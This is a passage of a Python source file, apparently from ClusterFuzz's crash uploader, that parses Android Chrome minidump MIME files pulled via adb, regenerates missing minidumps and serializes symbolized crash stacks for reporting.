mime_part = utils.decode_to_unicode(mime_part)
logs.log_error('Unexpected str mime_part from mime path %s: %s' %
(local_minidump_mime_path, mime_part))
continue
part_descriptor = list(mime_part.values())
key_tokens = part_descriptor[0].split('; ')
key_match = re.match(r'name="(.*)".*', key_tokens[1])
# Extract from the MIME part the key-value pairs used by report uploading.
if key_match is not None:
report_key = key_match.group(1)
report_value = mime_part.get_payload(decode=True)
if report_key == MINIDUMP_FILE_KEY:
utils.write_data_to_file(report_value, minidump_path)
else:
# Take care of aliases.
if report_key in ('prod', 'buildTargetId'):
report_key = PRODUCT_KEY
elif report_key == 'ver':
report_key = VERSION_KEY
# Save the key-value pair.
mime_key_values[report_key] = report_value
# Pull out product and version explicitly since these are required
# for upload.
product, version = None, None
if PRODUCT_KEY in mime_key_values:
product = mime_key_values.pop(PRODUCT_KEY).decode('utf-8')
else:
logs.log_error(
'Could not find \'%s\' or alias in mime_key_values key.' % PRODUCT_KEY)
if VERSION_KEY in mime_key_values:
version = mime_key_values.pop(VERSION_KEY).decode('utf-8')
else:
logs.log_error(
'Could not find \'%s\' or alias in mime_key_values key.' % VERSION_KEY)
# If missing, return None and log keys that do exist; otherwise, construct
# CrashReportInfo and return.
if product is None or version is None:
logs.log_error(
'mime_key_values dict keys:\n%s' % str(list(mime_key_values.keys())))
return None
return CrashReportInfo(
minidump_path=minidump_path,
product=product,
version=version,
optional_params=mime_key_values)
def get_crash_info(output):
"""Parse crash output to get (local) minidump path and any other information
useful for crash uploading, and store in a CrashReportInfo object."""
crash_stacks_directory = environment.get_value('CRASH_STACKTRACES_DIR')
output_lines = output.splitlines()
num_lines = len(output_lines)
is_android = environment.is_android()
for i, line in enumerate(output_lines):
if is_android:
# If we are on Android, the dump extraction is more complicated.
# The location placed in the crash-stacktrace is of the dump itself but
# in fact only the MIME of the dump exists, and will have a different
# extension. We need to pull the MIME and process it.
match = re.match(CRASH_DUMP_PATH_MARKER, line)
if not match:
continue
minidump_mime_filename_base = None
for j in range(i + 1, num_lines):
line = output_lines[j]
match = re.match(r'(.*)\.dmp', line)
if match:
minidump_mime_filename_base = os.path.basename(match.group(1).strip())
break
if not minidump_mime_filename_base:
logs.log_error('Minidump marker was found, but no path in stacktrace.')
return None
# Look for MIME. If none found, bail.
# We might not have copied over the crash dumps yet (copying is buffered),
# so we want to search both the original directory and the one to which
# the minidumps should later be copied.
device_directories_to_search = [
constants.CRASH_DUMPS_DIR,
os.path.dirname(line.strip())
]
device_minidump_search_paths = []
device_minidump_mime_path = None
for device_directory in device_directories_to_search:
device_minidump_mime_potential_paths = adb.run_shell_command(
['ls', '"%s"' % device_directory], root=True).splitlines()
device_minidump_search_paths += device_minidump_mime_potential_paths
for potential_path in device_minidump_mime_potential_paths:
# Check that we actually found a file, and the right one (not logcat).
if 'No such file or directory' in potential_path:
continue
if minidump_mime_filename_base not in potential_path:
continue
if '.up' in potential_path or '.dmp' in potential_path:
device_minidump_mime_path = os.path.join(device_directory,
potential_path)
break
# Break if we found a path.
if device_minidump_mime_path is not None:
break
# If we still didn't find a minidump path, bail.
if device_minidump_mime_path is None:
logs.log_error('Could not get MIME path from ls:\n%s' %
str(device_minidump_search_paths))
return None
# Pull out MIME and parse to minidump file and MIME parameters.
minidump_mime_filename = '%s.mime' % minidump_mime_filename_base
local_minidump_mime_path = os.path.join(crash_stacks_directory,
minidump_mime_filename)
adb.run_command([
'pull',
'"%s"' % device_minidump_mime_path, local_minidump_mime_path
])
if not os.path.exists(local_minidump_mime_path):
logs.log_error('Could not pull MIME from %s to %s.' %
(device_minidump_mime_path, local_minidump_mime_path))
return None
crash_info = parse_mime_to_crash_report_info(local_minidump_mime_path)
if crash_info is None:
return None
crash_info.unsymbolized_stacktrace = output
return crash_info
# Other platforms are not currently supported.
logs.log_error('Unable to fetch crash information for this platform.')
return None
# Could not find dump location, bail out. This could also happen when we don't
# have a minidump location in stack at all, e.g. when testcase does not crash
# during minimization.
return None
def get_crash_info_and_stacktrace(application_command_line, crash_stacktrace,
gestures):
"""Return crash minidump location and updated crash stacktrace."""
app_name_lower = environment.get_value('APP_NAME').lower()
retry_limit = environment.get_value('FAIL_RETRIES')
using_android = environment.is_android()
using_chrome = 'chrome' in app_name_lower or 'chromium' in app_name_lower
warmup_timeout = environment.get_value('WARMUP_TIMEOUT', 90)
# Minidump generation is only applicable on Chrome application.
# FIXME: Support minidump generation on platforms other than Android.
if not using_chrome or not using_android:
return None, crash_stacktrace
# Get the crash info from stacktrace.
crash_info = get_crash_info(crash_stacktrace)
# If we lost the minidump file, we need to recreate it.
# Note that because of the way crash_info is generated now, if we have a
# non-None crash_info, we should also have its minidump path; we insert
# the check to safeguard against possibly constructing the crash_info in
# other ways in the future that might potentially lose the minidump path.
if not crash_info or not crash_info.minidump_info.path:
for _ in range(retry_limit):
_, _, output = (
process_handler.run_process(
application_command_line,
timeout=warmup_timeout,
gestures=gestures))
crash_info = get_crash_info(output)
if crash_info and crash_info.minidump_info.path:
crash_stacktrace = utils.decode_to_unicode(output)
break
if not crash_info or not crash_info.minidump_info.path:
# We could not regenerate a minidump for this crash.
logs.log('Unable to regenerate a minidump for this crash.')
return crash_info, crash_stacktrace
def get_symbolized_stack_bytes(crash_type, crash_address, symbolized_stack):
"""Get bytes for symbolized crash proto."""
# FIXME: For some tests, crash_address is literally 'address'.
crash_address = stack_parser.format_address_to_dec(crash_address)
if crash_address is None:
# Instead of ignoring such reports, we pass 0xDEADBEEF address.
# Crash address is not applicable to many crash types (e.g. CHECK failures,
# MSan and UBSan crashes).
crash_address = 0xDEADBEEF
# TODO(jchinlee): Add os[_info] and cpu[_info] in form crash/ expects.
process_state = process_state_pb2.ProcessStateProto(
crash=process_state_pb2.ProcessStateProto.Crash(
reason=crash_type,
address=stack_parser.unsigned_to_signed(crash_address)),
requesting_thread=0,
)
try:
for stack in symbolized_stack:
thread = process_state.threads.add()
thread.frames.extend([stackframe.to_proto() for stackframe in stack])
return process_state.SerializeToString()
except Exception as e:
logs.log_error(
'Failed to get proto for crash:\n'
'Error: %s\n'
'Type: %s\n'
'Address: %s\n'
'Stack:\n%s\n' % (e, crash_type, crash_address, symbolized_stack))
return None
def save_crash_info_if_needed(testcase_id, crash_revision, job_type, crash_type,
crash_address, crash_frames):
"""Saves crash report for chromium project, skip otherwise."""
if data_handler.get_project_name(job_type) != 'chromium':
return None
serialized_crash_stack_frames = get_symbolized_stack_bytes(
crash_type, crash_address, crash_frames)
if not serialized_crash_stack_frames:
return None
crash_info = CrashReportInfo(
serialized_crash_stack_frames=serialized_crash_stack_frames)
# Get product and version (required).
platform = environment.platform()
crash_info.product = PRODUCT_MAP[platform]
crash_info.version = revisions.get_real_revision(
crash_revision, job_type, display=True)
# Update crash_info object with bot information and testcase id.
crash_info.bot_id = environment.get_value('BOT_NAME')
crash_info.testcase_id = int(testcase_id)
# Store CrashInfo metadata.
crash_report_metadata = crash_info.to_report_metadata()
crash_report_metadata.job_type = job_type
crash_report_metadata.crash_revision = crash_revision
crash_report_metadata.put()
logs.log('Created crash report entry for testcase %s.' % testcase_id)
return crash_info
|
google/clusterfuzz
|
src/clusterfuzz/_internal/chrome/crash_uploader.py
|
Python
|
apache-2.0
| 21,137
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.